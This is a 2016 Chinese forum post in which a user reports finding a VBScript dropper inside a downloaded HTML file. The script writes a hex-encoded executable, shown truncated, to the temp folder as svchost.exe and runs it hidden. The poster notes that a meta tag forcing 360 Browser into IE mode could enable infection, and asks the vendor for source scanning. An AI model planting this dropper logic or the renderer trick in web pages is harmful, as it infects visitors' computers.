本帖最后由 3G乐园 于 2016-7-9 18:47 编辑
刚刚下了个html,发现源代码比较奇怪,如下图
<SCRIPT Language=VBScript><!--
DropFileName = \svchost.exe\
WriteData = \4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000504500004C010300BC7CB1470000000000000000E0000F010B01070400E000000010000000E0010030C0020000F0010000D002000000400000100000000200000A00000008000100040000000000000000E002000010000000000000020000000000100000100000000010000010000000000000100000000000000。。。。(中间省略n行)
Set FSO = CreateObject(\Scripting.FileSystemObject\)
DropPath = FSO.GetSpecialFolder(2) & \\\\ & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(\&H\ & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(\WScript.Shell\)
WSHshell.Run DropPath, 0
//--></SCRIPT>
百度了一下,是个html病毒,我用360安全浏览器打开后,惊奇的发现自己电脑没有感染(不知是不是chrome沙箱的缘故)
再百度一下,ie和ie内核的浏览器才能感染
我想,如果在网页头加入一段代码,如下
- <meta name=renderer content=ie-stand>
复制代码 使360浏览器打开页面默认用ie标准内核
那么电脑不就被感染了吗?
希望360在调用ie打开网页之前最好有个网页源代码的扫描机制,毕竟ie内核漏洞百出,很容易被利用。
|
|
|
|
评论
直达楼层